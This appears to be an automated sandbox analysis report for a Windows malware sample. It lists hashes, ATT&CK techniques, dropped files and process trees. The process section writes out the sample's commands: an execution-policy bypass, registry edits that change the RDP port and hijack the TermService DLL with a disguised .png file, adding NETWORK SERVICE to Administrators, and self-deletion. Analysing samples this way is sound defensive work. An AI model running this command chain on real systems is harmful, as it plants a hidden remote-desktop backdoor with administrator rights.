25030c2357ace3a1713e4698aa6e139e888d880b57e5772d39447a42ac301591

General

Target

25030c2357ace3a1713e4698aa6e139e888d880b57e5772d39447a42ac301591.exe
Size

3.8MB
MD5

ddf329f7573b2a7dcdf11e8734a44850
SHA1

cbf1ea887d769a1f094b197c000dda8426d3f7f6
SHA256

25030c2357ace3a1713e4698aa6e139e888d880b57e5772d39447a42ac301591
SHA512

f5301d9f2ee4a7d31f712ef1cc433f72bcd01033872d1e29dfbdcc6fc10d873b3c36c8630989b944cc45cd39829b10697f23db0cb0aceeda12932b5889d639f8

Score

9^/10

persistence

Malware Config

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Deletes itself 1 IoCs

Processes:

powershell.exe

pid process

732 powershell.exe
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\SysWOW64\rdpclip.exe powershell.exe

description	ioc	process
File created	C:\Windows\SysWOW64\rdpclip.exe	powershell.exe

Modifies service 2 TTPs 2 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters	reg.exe
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Drops file in Windows directory 8 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3348 reg.exe
Runs net.exe

pid	process
3348	reg.exe

Suspicious behavior: EnumeratesProcesses 15 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid	process
732	powershell.exe
732	powershell.exe
732	powershell.exe
1236	powershell.exe
1236	powershell.exe
1236	powershell.exe
3664	powershell.exe
3664	powershell.exe
3664	powershell.exe
3068	powershell.exe
3068	powershell.exe
3068	powershell.exe
732	powershell.exe
732	powershell.exe
732	powershell.exe

Suspicious behavior: LoadsDriver 1 IoCs

Processes:

pid process

616

pid	process
616

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	732	powershell.exe
Token: SeDebugPrivilege	1236	powershell.exe
Token: SeDebugPrivilege	3664	powershell.exe
Token: SeDebugPrivilege	3068	powershell.exe

Suspicious use of WriteProcessMemory 63 IoCs

Processes:

25030c2357ace3a1713e4698aa6e139e888d880b57e5772d39447a42ac301591.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.exe

description	pid	process	target process
PID 636 wrote to memory of 732	636	25030c2357ace3a1713e4698aa6e139e888d880b57e5772d39447a42ac301591.exe	powershell.exe
PID 636 wrote to memory of 732	636	25030c2357ace3a1713e4698aa6e139e888d880b57e5772d39447a42ac301591.exe	powershell.exe
PID 636 wrote to memory of 732	636	25030c2357ace3a1713e4698aa6e139e888d880b57e5772d39447a42ac301591.exe	powershell.exe
PID 732 wrote to memory of 2388	732	powershell.exe	csc.exe
PID 732 wrote to memory of 2388	732	powershell.exe	csc.exe
PID 732 wrote to memory of 2388	732	powershell.exe	csc.exe
PID 2388 wrote to memory of 1240	2388	csc.exe	cvtres.exe
PID 2388 wrote to memory of 1240	2388	csc.exe	cvtres.exe
PID 2388 wrote to memory of 1240	2388	csc.exe	cvtres.exe
PID 732 wrote to memory of 1236	732	powershell.exe	powershell.exe
PID 732 wrote to memory of 1236	732	powershell.exe	powershell.exe
PID 732 wrote to memory of 1236	732	powershell.exe	powershell.exe
PID 732 wrote to memory of 3664	732	powershell.exe	powershell.exe
PID 732 wrote to memory of 3664	732	powershell.exe	powershell.exe
PID 732 wrote to memory of 3664	732	powershell.exe	powershell.exe
PID 732 wrote to memory of 3068	732	powershell.exe	powershell.exe
PID 732 wrote to memory of 3068	732	powershell.exe	powershell.exe
PID 732 wrote to memory of 3068	732	powershell.exe	powershell.exe
PID 732 wrote to memory of 992	732	powershell.exe	reg.exe
PID 732 wrote to memory of 992	732	powershell.exe	reg.exe
PID 732 wrote to memory of 992	732	powershell.exe	reg.exe
PID 732 wrote to memory of 3348	732	powershell.exe	reg.exe
PID 732 wrote to memory of 3348	732	powershell.exe	reg.exe
PID 732 wrote to memory of 3348	732	powershell.exe	reg.exe
PID 732 wrote to memory of 2780	732	powershell.exe	reg.exe
PID 732 wrote to memory of 2780	732	powershell.exe	reg.exe
PID 732 wrote to memory of 2780	732	powershell.exe	reg.exe
PID 732 wrote to memory of 3460	732	powershell.exe	net.exe
PID 732 wrote to memory of 3460	732	powershell.exe	net.exe
PID 732 wrote to memory of 3460	732	powershell.exe	net.exe
PID 3460 wrote to memory of 2968	3460	net.exe	net1.exe
PID 3460 wrote to memory of 2968	3460	net.exe	net1.exe
PID 3460 wrote to memory of 2968	3460	net.exe	net1.exe
PID 732 wrote to memory of 4048	732	powershell.exe	cmd.exe
PID 732 wrote to memory of 4048	732	powershell.exe	cmd.exe
PID 732 wrote to memory of 4048	732	powershell.exe	cmd.exe
PID 4048 wrote to memory of 4076	4048	cmd.exe	cmd.exe
PID 4048 wrote to memory of 4076	4048	cmd.exe	cmd.exe
PID 4048 wrote to memory of 4076	4048	cmd.exe	cmd.exe
PID 4076 wrote to memory of 1288	4076	cmd.exe	net.exe
PID 4076 wrote to memory of 1288	4076	cmd.exe	net.exe
PID 4076 wrote to memory of 1288	4076	cmd.exe	net.exe
PID 1288 wrote to memory of 1128	1288	net.exe	net1.exe
PID 1288 wrote to memory of 1128	1288	net.exe	net1.exe
PID 1288 wrote to memory of 1128	1288	net.exe	net1.exe
PID 732 wrote to memory of 740	732	powershell.exe	cmd.exe
PID 732 wrote to memory of 740	732	powershell.exe	cmd.exe
PID 732 wrote to memory of 740	732	powershell.exe	cmd.exe
PID 740 wrote to memory of 3832	740	cmd.exe	cmd.exe
PID 740 wrote to memory of 3832	740	cmd.exe	cmd.exe
PID 740 wrote to memory of 3832	740	cmd.exe	cmd.exe
PID 3832 wrote to memory of 3172	3832	cmd.exe	net.exe
PID 3832 wrote to memory of 3172	3832	cmd.exe	net.exe
PID 3832 wrote to memory of 3172	3832	cmd.exe	net.exe
PID 3172 wrote to memory of 2360	3172	net.exe	net1.exe
PID 3172 wrote to memory of 2360	3172	net.exe	net1.exe
PID 3172 wrote to memory of 2360	3172	net.exe	net1.exe
PID 732 wrote to memory of 3860	732	powershell.exe	cmd.exe
PID 732 wrote to memory of 3860	732	powershell.exe	cmd.exe
PID 732 wrote to memory of 3860	732	powershell.exe	cmd.exe
PID 732 wrote to memory of 2308	732	powershell.exe	cmd.exe
PID 732 wrote to memory of 2308	732	powershell.exe	cmd.exe
PID 732 wrote to memory of 2308	732	powershell.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\25030c2357ace3a1713e4698aa6e139e888d880b57e5772d39447a42ac301591.exe
"C:\Users\Admin\AppData\Local\Temp\25030c2357ace3a1713e4698aa6e139e888d880b57e5772d39447a42ac301591.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:636

\??\c:\windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
2⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:732

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gruiat1f\gruiat1f.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:2388

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB338.tmp" "c:\Users\Admin\AppData\Local\Temp\gruiat1f\CSC7F71C50E462A47E1BA36AB68DBA833.TMP"
4⤵
PID:1240

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1236

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3664

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3068

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:992

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Modifies service
- Modifies registry key
PID:3348

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
PID:2780

C:\Windows\SysWOW64\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
- Suspicious use of WriteProcessMemory
PID:3460

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
PID:2968

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
- Suspicious use of WriteProcessMemory
PID:4048

C:\Windows\SysWOW64\cmd.exe
cmd /c net start rdpdr
4⤵
- Suspicious use of WriteProcessMemory
PID:4076

C:\Windows\SysWOW64\net.exe
net start rdpdr
5⤵
- Suspicious use of WriteProcessMemory
PID:1288

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
PID:1128

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
- Suspicious use of WriteProcessMemory
PID:740

C:\Windows\SysWOW64\cmd.exe
cmd /c net start TermService
4⤵
- Suspicious use of WriteProcessMemory
PID:3832

C:\Windows\SysWOW64\net.exe
net start TermService
5⤵
- Suspicious use of WriteProcessMemory
PID:3172

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 start TermService
6⤵
PID:2360

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
PID:3860

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
PID:2308

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

1

T1098

Registry Run Keys / Startup Folder

1

T1060

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

3

T1112

Credential Access

Discovery

Lateral Movement

Remote Desktop Protocol

1

T1076

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
MD5
f3068198b62b4b70404ec46694d632be

SHA1
7b0b31ae227cf2a78cb751573a9d07f755104ea0

SHA256
bd0fab28319be50795bd6aa9692742ba12539b136036acce2e0403f10a779fc8

SHA512
ef285a93898a9436219540f247beb52da69242d05069b3f50d1761bb956ebb8468aeaeadcb87dd7a09f5039c479a31f313c83c4a63c2b2f789f1fe55b4fa9795

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESB338.tmp
MD5
d319e01942aed1ab29b07d22d0e2940e

SHA1
13100d8740e9ac917e1d5a0d0154b4f2efa95a5c

SHA256
6e2eaee6e1f2d5141bbd49cbff783c7c7fa0e8d0fb8d5a891fd220c44edc9fba

SHA512
a138380679fc2f34e685ef4c62338c4cec1c2638d544a8b62f0afbe98761bb011fd9c9712629d1c3a64c8463f03b0f81fcb74896712358551e5e9e9eb0420a11

Download Submit
C:\Users\Admin\AppData\Local\Temp\get-points.ps1
MD5
851bf8df96899b2cc50af8047e9fbe5c

SHA1
e259d3ea9eabae926f74358b6e8f583cfcb4106b

SHA256
b920aeb39633531fc8150a758f0d1d697c51f5d7b7dc09a73e68b76948cd39d6

SHA512
648ad3ed2b6a1d16d6d43f7a264d3dc3112415c14c7eaab9c214725ca4abfac0640ff8a724c994a8b6d73fe0c3e74339291bf45d63501ac3dcdc40ce38a30792

Download Submit
C:\Users\Admin\AppData\Local\Temp\gruiat1f\gruiat1f.dll
MD5
b01fa887bebcc269fe2be5a945e65dc5

SHA1
ef298feec516a2af1aa574c9f3b7c1b713ef30db

SHA256
7fc39aa61e0adb2cc2a047a224e9e104cd19282ab4bc09f856219db9f4c5f8e9

SHA512
53a75f78912c4c97c3cc8b09954e7666c906e76eac4abc958014a727c07baf03458a6098e677a1cd23243b374ac851cc1932f48a2efb262c4aff4f909baf4c76

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gruiat1f\CSC7F71C50E462A47E1BA36AB68DBA833.TMP
MD5
5ee70167d27e150a0c1917c43c022060

SHA1
11c8bde45b6a1ef8decfcfd955c47e9cd0fc83ef

SHA256
b6aa2c3346cdbb2ae2bab02cf0389604be2602c1c246a22fa78d03b740160dc4

SHA512
a7befca1cf74968ac1dcfebb3cfdcdf208666723a261b5ae67cceafd17e3e192baf96324cdb1974589fcdca2c42c853136354e116c0bf9c5e2a406dbe4e374a9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gruiat1f\gruiat1f.0.cs
MD5
6f235215132cdebacd0f793fe970d0e3

SHA1
2841e44c387ed3b6f293611992f1508fe9b55b89

SHA256
ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec

SHA512
a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\gruiat1f\gruiat1f.cmdline
MD5
a5af84e661049a067cdb89bff475babc

SHA1
53af88284e70199d6f83b04bccdd5a802fe86484

SHA256
955494fed2bf18ced4d69e42f3e51a190e89a7b0da52bc3849bea52bfeccc936

SHA512
3715483aa6675fe5121c6b6e269de293a8b229a5d1e6692ef780c0e1decb6f8e142728bb6c75f77eb2cfd2538b6e848e0d38be453d0a3aaf0e82d9a30c62b754

Download Submit
memory/732-133-0x0000000009BA0000-0x0000000009BA1000-memory.dmp

Filesize
4KB

Download
memory/732-3-0x00000000079B0000-0x00000000079B1000-memory.dmp

Filesize
4KB

Download
memory/732-9-0x0000000008C10000-0x0000000008C11000-memory.dmp

Filesize
4KB

Download
memory/732-10-0x0000000008A60000-0x0000000008A61000-memory.dmp

Filesize
4KB

Download
memory/732-7-0x00000000083B0000-0x00000000083B1000-memory.dmp

Filesize
4KB

Download
memory/732-12-0x000000000C2E0000-0x000000000C2E1000-memory.dmp

Filesize
4KB

Download
memory/732-13-0x000000000A880000-0x000000000A881000-memory.dmp

Filesize
4KB

Download
memory/732-6-0x0000000008100000-0x0000000008101000-memory.dmp

Filesize
4KB

Download
memory/732-5-0x00000000082E0000-0x00000000082E1000-memory.dmp

Filesize
4KB

Download
memory/732-4-0x0000000008060000-0x0000000008061000-memory.dmp

Filesize
4KB

Download
memory/732-106-0x0000000007930000-0x0000000007931000-memory.dmp

Filesize
4KB

Download
memory/732-8-0x0000000008350000-0x0000000008351000-memory.dmp

Filesize
4KB

Download
memory/732-2-0x0000000007340000-0x0000000007341000-memory.dmp

Filesize
4KB

Download
memory/732-1-0x0000000073C90000-0x000000007437E000-memory.dmp

Filesize
6.9MB

Download
memory/732-21-0x0000000008B50000-0x0000000008B51000-memory.dmp

Filesize
4KB

Download
memory/732-22-0x0000000009780000-0x0000000009781000-memory.dmp

Filesize
4KB

Download
memory/732-0-0x0000000000000000-mapping.dmp

Download
memory/732-107-0x0000000009ED0000-0x0000000009ED1000-memory.dmp

Filesize
4KB

Download
memory/740-117-0x0000000000000000-mapping.dmp

Download
memory/992-108-0x0000000000000000-mapping.dmp

Download
memory/1128-116-0x0000000000000000-mapping.dmp

Download
memory/1236-43-0x0000000008710000-0x0000000008711000-memory.dmp

Filesize
4KB

Download
memory/1236-24-0x0000000073C90000-0x000000007437E000-memory.dmp

Filesize
6.9MB

Download
memory/1236-48-0x00000000082C0000-0x00000000082C1000-memory.dmp

Filesize
4KB

Download
memory/1236-23-0x0000000000000000-mapping.dmp

Download
memory/1236-35-0x0000000008730000-0x0000000008763000-memory.dmp

Filesize
204KB

Download
memory/1236-45-0x0000000008A20000-0x0000000008A21000-memory.dmp

Filesize
4KB

Download
memory/1236-44-0x0000000008870000-0x0000000008871000-memory.dmp

Filesize
4KB

Download
memory/1236-46-0x0000000008320000-0x0000000008321000-memory.dmp

Filesize
4KB

Download
memory/1240-17-0x0000000000000000-mapping.dmp

Download
memory/1288-115-0x0000000000000000-mapping.dmp

Download
memory/2308-122-0x0000000000000000-mapping.dmp

Download
memory/2360-120-0x0000000000000000-mapping.dmp

Download
memory/2388-14-0x0000000000000000-mapping.dmp

Download
memory/2780-110-0x0000000000000000-mapping.dmp

Download
memory/2968-112-0x0000000000000000-mapping.dmp

Download
memory/3068-79-0x0000000073C90000-0x000000007437E000-memory.dmp

Filesize
6.9MB

Download
memory/3068-78-0x0000000000000000-mapping.dmp

Download
memory/3172-119-0x0000000000000000-mapping.dmp

Download
memory/3348-109-0x0000000000000000-mapping.dmp

Download
memory/3460-111-0x0000000000000000-mapping.dmp

Download
memory/3664-51-0x0000000073C90000-0x000000007437E000-memory.dmp

Filesize
6.9MB

Download
memory/3664-50-0x0000000000000000-mapping.dmp

Download
memory/3832-118-0x0000000000000000-mapping.dmp

Download
memory/3860-121-0x0000000000000000-mapping.dmp

Download
memory/4048-113-0x0000000000000000-mapping.dmp

Download
memory/4076-114-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads